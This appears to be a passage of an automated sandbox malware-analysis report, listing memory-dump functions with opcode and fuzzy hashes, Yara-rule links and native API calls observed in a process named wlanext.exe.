Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: dff33ec090c67df0050dc61229eed7ce82cc366a52ef6fa3b6baff648812558d
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 61C02BB0250440FBD7251F30CE11F147268F740E23FA403587324464F0D5289C00D101

Uniqueness

Uniqueness Score: -1.00%

Function 019B76E2, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: ff72fa40cf744e2cd27b50fe4decd1dc72364961cfe5c9fdc92272a9c001dcd1
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: FDC08C701411C49AEB2E578CCF64B203A58AB88A0AF480A9CAA490D4E2C368AC02D609

Uniqueness

Uniqueness Score: -1.00%

Function 019C3A1C, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: a0fdc95d4cf12422ced575227a9dde038d3f15c84cc84da11c3c67e3e2ca72f6
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 34C08C32180248BBC7226E41DD00F017B29E7A0B60F000020B6480B5618532EC60D588

Uniqueness

Uniqueness Score: -1.00%

Function 019C7D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: c63b5ad6cd28d156ce6de433eba0bd4b513f47570ac13fd3f3f31fddcc4e3ec3
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: C3B092353019418FCE5ADF18C080B1533E8BB44A40F8400D4E404CBA21D229E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 019D2ACB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 2221b89ba6ff61ce002ade3d7972df4b957dcc8c89eb49a40167f3625efc7390
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: F7B01232C10451CFCF02EF40C750B997335FB40750F054490900227930C228AC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 019E99D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4e0cb52d081d281b67d6a4456077818c1244078465c4e3779fe8c6e952211b6
Instruction ID: 1080411f8b29e335534abe23bd5f84ef81cc8407b338b35c4b6c1b50cdcf8888
Opcode Fuzzy Hash: a4e0cb52d081d281b67d6a4456077818c1244078465c4e3779fe8c6e952211b6
Instruction Fuzzy Hash: 559002A161110052D1046199440470640C5A7E1241F52C016A3184554CC5698C617265

Uniqueness

Uniqueness Score: -1.00%

Function 019E95F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ecdb83829b80688318058a56929698c64556c09581708a99e25d35fd8f136ea
Instruction ID: f0afd7b2427d50d3c9966913a1628dd633f40e3b8ac6e1797e2be0f4a2263c50
Opcode Fuzzy Hash: 6ecdb83829b80688318058a56929698c64556c09581708a99e25d35fd8f136ea
Instruction Fuzzy Hash: 8590027160110812D104619948047864085A7D0341F52C015A7054655ED6A588917271

Uniqueness

Uniqueness Score: -1.00%

Function 019EAD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10b7cd5e594dae869c0b85368b35581bde7d21fd49bf7e6e3edd9caf01c30415
Instruction ID: b58ed1d79fb2d1d414f4e8d95f0b9fc1bc0829f10d6e1497b58277f7f569a9e2
Opcode Fuzzy Hash: 10b7cd5e594dae869c0b85368b35581bde7d21fd49bf7e6e3edd9caf01c30415
Instruction Fuzzy Hash: FD900271E05100229140719948147468086B7E0781B56C015A1544554CC9948A5573E1

Uniqueness

Uniqueness Score: -1.00%

Function 019E9520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849b01dd37d2dc45c6a1e0dfc851832a977bd33fd4a1be13860a8812c612fac2
Instruction ID: f2684de457354e27329aaecf3141850a666e931ca8417e516449a69c175d95f8
Opcode Fuzzy Hash: 849b01dd37d2dc45c6a1e0dfc851832a977bd33fd4a1be13860a8812c612fac2
Instruction Fuzzy Hash: B89002E1601240A24500A2998404B0A8585A7E0241B52C01AE2084560CC5658851B275

Uniqueness

Uniqueness Score: -1.00%

Function 019E9950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf7705b35b05937ec94d29b16de9ab6d2e453c0a9a1b2b80d5cc07c22b5a99ca
Instruction ID: 9e11675bc222890367255083ff27b01449a431a37fb8ef1560c67b7bdb3dbe9e
Opcode Fuzzy Hash: cf7705b35b05937ec94d29b16de9ab6d2e453c0a9a1b2b80d5cc07c22b5a99ca
Instruction Fuzzy Hash: 049002A160150413D140659948047074085A7D0342F52C015A3094555ECA698C517275

Uniqueness

Uniqueness Score: -1.00%

Function 019E9560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abcceca8133209d9a10e5cd02920264677177256af8fbd70c8bbcc4dc628b603
Instruction ID: 1c7df99a60e2cdc3eb7e0a78744f38cbf3e2abe4317c8f8ec76c64237087b1f9
Opcode Fuzzy Hash: abcceca8133209d9a10e5cd02920264677177256af8fbd70c8bbcc4dc628b603
Instruction Fuzzy Hash: C2900265621100120145A599060460B44C5B7D6391392C019F2446590CC66188657361

Uniqueness

Uniqueness Score: -1.00%

Function 019E98A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 478d5e7f41701283de95335dc64549088bac9420efa24e21bbbcebf37f201707
Instruction ID: 0dfcec3a325ad2549d1cb52d6f8beddab258096d49438e4ab5b82065fceb2372
Opcode Fuzzy Hash: 478d5e7f41701283de95335dc64549088bac9420efa24e21bbbcebf37f201707
Instruction Fuzzy Hash: 3A90026170110412D102619944147064089E7D1385F92C016E2454555DC6658953B272

Uniqueness

Uniqueness Score: -1.00%

Function 019E9820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 016d68d92a31f5880901b503231c6ebc92938ecfdc9947baa0763ba9de1a5af8
Instruction ID: 569f48900a69d324bbac5a6abe59a001e58c09433555c38adb74ea89952f9351
Opcode Fuzzy Hash: 016d68d92a31f5880901b503231c6ebc92938ecfdc9947baa0763ba9de1a5af8
Instruction Fuzzy Hash: D790027164110412D141719944047064089B7D0281F92C016A1454554EC6958A56BBA1

Uniqueness

Uniqueness Score: -1.00%

Function 019EB040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b17103000be894b8f4dd2d62a1cfec57d930fdb075dd9cf0cf95843ec6efba
Instruction ID: 76de9c93119a2fa832f03de02f6c1bad7219002737984063c3efade1c69e1952
Opcode Fuzzy Hash: c9b17103000be894b8f4dd2d62a1cfec57d930fdb075dd9cf0cf95843ec6efba
Instruction Fuzzy Hash: 679002A1A01240534540B19948045069095B7E1341392C125A1484560CC6A88855B3A5

Uniqueness

Uniqueness Score: -1.00%

Function 019EA3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 761138bd10d31f70c79d4e5d514d2b2fc4d76d596a895f0d9b398ac98cd1edbd
Instruction ID: aed3636be69cab7e1d2c67aeb6080feffe977126126a68fedb380d5f9c13cfd0
Opcode Fuzzy Hash: 761138bd10d31f70c79d4e5d514d2b2fc4d76d596a895f0d9b398ac98cd1edbd
Instruction Fuzzy Hash: 1A90027160154012D1407199844470B9085B7E0341F52C415E1455554CC6558856B361

Uniqueness

Uniqueness Score: -1.00%

Function 019E9FE0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0161198be7ee06e6928d9e6fddc34ab30ce5fff28cb2f30b5a2947283c25a6b
Instruction ID: 6a19ee263176027788e89d64f9d79a3091427294919977445c4018c6bd99421f
Opcode Fuzzy Hash: a0161198be7ee06e6928d9e6fddc34ab30ce5fff28cb2f30b5a2947283c25a6b
Instruction Fuzzy Hash: EC90027171124412D110619984047064085A7D1241F52C415A1854558DC6D588917262

Uniqueness

Uniqueness Score: -1.00%

Function 019EA710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 590df89f1446d4f5955736f77f401667fc7518125b9daa0bdbf59021e6f0e6a3
Instruction ID: edf750abdec4db814f51e1b0e1fe42d3127f1986152e167597fd06fe15296181
Opcode Fuzzy Hash: 590df89f1446d4f5955736f77f401667fc7518125b9daa0bdbf59021e6f0e6a3
Instruction Fuzzy Hash: 09900271701100629500A6D95804B4A8185A7F0341B52D019A5044554CC59488617261

Uniqueness

Uniqueness Score: -1.00%

Function 019E9B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ea21da1a7819738df098eed59803484df2a3d579d5b8582967c243bee433a3
Instruction ID: 637b32d7686d90ae50ef6924389e9466710cab3278e8d43642271e680105a030
Opcode Fuzzy Hash: 07ea21da1a7819738df098eed59803484df2a3d579d5b8582967c243bee433a3
Instruction Fuzzy Hash: 4390026164110812D140719984147074086E7D0641F52C015A1054554DC656896577F1

Uniqueness

Uniqueness Score: -1.00%

Function 019E9730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 443ee8021ba228838ce5b98e247e2c8daf31a38672b7a6923b883d1bbdff3dd6
Instruction ID: 0480a61025756c8223a0658bf3f710334853a16ae7dc493756865efd07fbc1a7
Opcode Fuzzy Hash: 443ee8021ba228838ce5b98e247e2c8daf31a38672b7a6923b883d1bbdff3dd6
Instruction Fuzzy Hash: 0B900261A0510412D140719954187064095A7D0241F52D015A1054554DC6998A5577E1

Uniqueness

Uniqueness Score: -1.00%

Function 019E9770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 936dce75900fbf1f34c8152b20909d36cb5e1f0ec9bca5e6a6719da40eabad6c
Instruction ID: b53c9b6b66e30f905d2374bed4ab3731a61d9d6e5962a538a76b3e555dcbf579
Opcode Fuzzy Hash: 936dce75900fbf1f34c8152b20909d36cb5e1f0ec9bca5e6a6719da40eabad6c
Instruction Fuzzy Hash: 3C90026160514452D10065995408B064085A7D0245F52D015A2094595DC6758851B271

Uniqueness

Uniqueness Score: -1.00%

Function 019EA770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc95ee784886efdb7cdf8236407d1d39fa66c514343629773f4580666a7e9872
Instruction ID: c655cec035ee66f51cec26862102e8bb519dd22d86fabea9d6aa00c160256960
Opcode Fuzzy Hash: cc95ee784886efdb7cdf8236407d1d39fa66c514343629773f4580666a7e9872
Instruction Fuzzy Hash: EA90027560514452D50065995804B874085A7D0345F52D415A145459CDC6948861B261

Uniqueness

Uniqueness Score: -1.00%

Function 019E9760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b53810458c41ff2da0be8aaf4bc062107ea63842641f2b4996acde06c8eda15
Instruction ID: e6f4e7051680f716454d383fa6c6de42472b87346d906b2b0111d1078e659d96
Opcode Fuzzy Hash: 9b53810458c41ff2da0be8aaf4bc062107ea63842641f2b4996acde06c8eda15
Instruction Fuzzy Hash: 0690027160110413D100619955087074085A7D0241F52D415A1454558DD69688517261

Uniqueness

Uniqueness Score: -1.00%

Function 019E9A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 481d684b15f8f4d6eef57ef5a5349bfebaf7ca0267b95828da8bd9e211d59a39
Instruction ID: 300edb1b265ec48465f6854876fecec5f0cfcbb871453fc58d10e008a5f58474
Opcode Fuzzy Hash: 481d684b15f8f4d6eef57ef5a5349bfebaf7ca0267b95828da8bd9e211d59a39
Instruction Fuzzy Hash: 6190026160154452D14062994804B0F8185A7E1242F92C01DA5186554CC95588557761

Uniqueness

Uniqueness Score: -1.00%

Function 019E96D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79f22a01c5375394262fd06fc66d8088dd8bc5948d8e12338a8629d719ba44bb
Instruction ID: 531c34abe9a7642bc894392b2e1d4186846624cfff68bd659306a470584a0988
Opcode Fuzzy Hash: 79f22a01c5375394262fd06fc66d8088dd8bc5948d8e12338a8629d719ba44bb
Instruction Fuzzy Hash: 2D90027160110852D10061994404B464085A7E0341F52C01AA1154654DC655C8517661

Uniqueness

Uniqueness Score: -1.00%

Function 019E9610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26be6917758001abf592172f9954e276cb00e90e84d1aa5711cb96f8ea4052b4
Instruction ID: c73d59bbf15207b9dcbb3037c289c34846188bfabc0983c4805b6066c1c6996b
Opcode Fuzzy Hash: 26be6917758001abf592172f9954e276cb00e90e84d1aa5711cb96f8ea4052b4
Instruction Fuzzy Hash: 8E900271A0510812D150719944147464085A7D0341F52C015A1054654DC7958A5577E1

Uniqueness

Uniqueness Score: -1.00%

Function 019E9A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0136f706cbd8a3834f3e991f3211840e4c9838ad85f92868b363b6f212905173
Instruction ID: 61a3a4b24885a20f92e7f976e351d2a5f2e6711a0c42aed0b3dd808053f38a17
Opcode Fuzzy Hash: 0136f706cbd8a3834f3e991f3211840e4c9838ad85f92868b363b6f212905173
Instruction Fuzzy Hash: 9490027160150412D100619948087474085A7D0342F52C015A6194555EC6A5C8917671

Uniqueness

Uniqueness Score: -1.00%

Function 019E9650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca78b9333bc50b30d46b5f3444bbf303988ba8c6b5174a37d81667d1ed8cbf24
Instruction ID: 074b914f40a6802ebc65ecc496e6f78aeacb66da939127089cb2c031c2c5ba50
Opcode Fuzzy Hash: ca78b9333bc50b30d46b5f3444bbf303988ba8c6b5174a37d81667d1ed8cbf24
Instruction Fuzzy Hash: 2B90027160514852D14071994404B464095A7D0345F52C015A1094694DD6658D55B7A1

Uniqueness

Uniqueness Score: -1.00%

Function 019E9670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: c60c37e74b7d68a97c296cc2cb0f9392c03fbb41ef3665a11ba28474cd54faf2
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01A3FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A3FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A3FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A3FE2B

Memory Dump Source

Source File: 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp, Offset: 01980000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 28b4f53c71d777a86a24090981c7bf4eda17375a458a7feb3e75aefddc28325c
Instruction ID: f7032989d7cddf4574def5e129cfa36c4edab73e50c02f181154a9bb7e61e676
Opcode Fuzzy Hash: 28b4f53c71d777a86a24090981c7bf4eda17375a458a7feb3e75aefddc28325c
Instruction Fuzzy Hash: CEF0FC72540101BFDB211B49DC06F237F5ADBC4730F240314F628555D1D962F82086F1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wlanext.exe PID: 4868 Parent PID: 3440 wlanext.exeCOMMON

Executed Functions

Function 02F29D5A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02F24B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F24B87,007A002E,00000000,00000060,00000000,00000000), ref: 02F29DAD

Strings

.z`, xrefs: 02F29D9D, 02F29DA8

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: fba5bec19bd01a611589038f4169e6217c1158b92e759259479d5eae6a5c6b8f
Instruction ID: 25a8a24a870b14630c0f9aaaf4d835afbf6a691aa3f746b62827f3184d0be49f
Opcode Fuzzy Hash: fba5bec19bd01a611589038f4169e6217c1158b92e759259479d5eae6a5c6b8f
Instruction Fuzzy Hash: BF01A4B6254118ABCB08CF98DC94DEB77A9AF8C754F158648FA5D97241C630E8518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F29D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02F24B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F24B87,007A002E,00000000,00000060,00000000,00000000), ref: 02F29DAD

Strings

.z`, xrefs: 02F29D9D, 02F29DA8

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 7a0de23c034e278c1d2cd02b03dea3302b2e21278d75190d75c096d2af1070cd
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 13F0B6B2200108ABCB08CF89DC94DEB77ADAF8C754F158248BA0D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02F29DB2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02F24B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F24B87,007A002E,00000000,00000060,00000000,00000000), ref: 02F29DAD

Strings

.z`, xrefs: 02F29D9D, 02F29DA8

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: c8d317cc902a4eb519eb1f160d349baf79fe91cb1dbf8cfc74ffe6a93ece3173
Instruction ID: f3b6582e059b26f8c47e64ac41b168f72ec61c792d5470a9f8ebbf6ebe96af1c
Opcode Fuzzy Hash: c8d317cc902a4eb519eb1f160d349baf79fe91cb1dbf8cfc74ffe6a93ece3173
Instruction Fuzzy Hash: 37F02BB2214509AF8B48CF9CD890CEB73FAAF8C754B558608FA5ED3244D631EC51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02F29E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02F24D42,5EB6522D,FFFFFFFF,02F24A01,?,?,02F24D42,?,02F24A01,FFFFFFFF,5EB6522D,02F24D42,?,00000000), ref: 02F29E55

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: aa9b210636ae67af627d4611cb43db4dbcaad92ff45e078a008b3f283dfd79f5
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 09F0B7B2200208AFCB14DF89DC90EEB77ADEF8C754F158248BE1DA7241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F29F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02F12D11,00002000,00003000,00000004), ref: 02F29F79

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: ba2a15c14b6825b065da54d238369b3fec5c882ed137261f498c7d8686f83057
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: A8F015B2200218ABCB14DF89CC80EAB77ADEF88750F118148BE08A7241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F29E8A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02F24D20,?,?,02F24D20,00000000,FFFFFFFF), ref: 02F29EB5

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: c26365f5a346234319600d70a697d9f1f4956e66a8961abfc3ecd05848a36544
Instruction ID: 8af1ce918bdd0c2d0af8b0c0ccaee111dc0b5f5a2ce1b0322c5cd6776ca75b84
Opcode Fuzzy Hash: c26365f5a346234319600d70a697d9f1f4956e66a8961abfc3ecd05848a36544
Instruction Fuzzy Hash: 5DE0C236200210ABE710EB94CCC6EE77B68EF49760F054488FA89AB242C530E5008B90

Uniqueness

Uniqueness Score: -1.00%

Function 02F29E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02F24D20,?,?,02F24D20,00000000,FFFFFFFF), ref: 02F29EB5

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 0e88a1362811fcd156195af4190a6a2ae9217298035f0e09f1fb7b790d5f43ea
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 08D012752002146BD710EB99CC85E97775DEF44B50F154455BA586B241C530F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 02F2A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F13AF8), ref: 02F2A09D

Strings

.z`, xrefs: 02F2A08C, 02F2A098

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: e45e44466ae7f8e3282fcbe83de980cc824b96be0b88561c575431006f11e606
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 55E04FB12002186BD714DF59CC44EA777ADEF88750F018554FE0867241C630F914CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02F18373, Relevance: 3.2, APIs: 2, Instructions: 188threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F1834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F1836B

Memory Dump Source

Source File: 00000014.00000002.595689407.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: c485f6f075021a2e559533d390af32e5098ae6a14e8cd6375b9f65357e62328d
Instruction ID: 16b935f000c5eb7155f93d2ae7d94dce672775b1160da3aec3b96787a07e9759
Opcode Fuzzy Hash: c485f6f075021a2e559533d390af32e5098ae6a14e8cd6375b9f65357e62328d
Instruction Fuzzy Hash: 10610570A003196FE724DF64CD85FABB7E8EF05384F10056DEA49A7280DB70A945CFA5

Uniqueness

Uniqueness Score: -1.00%

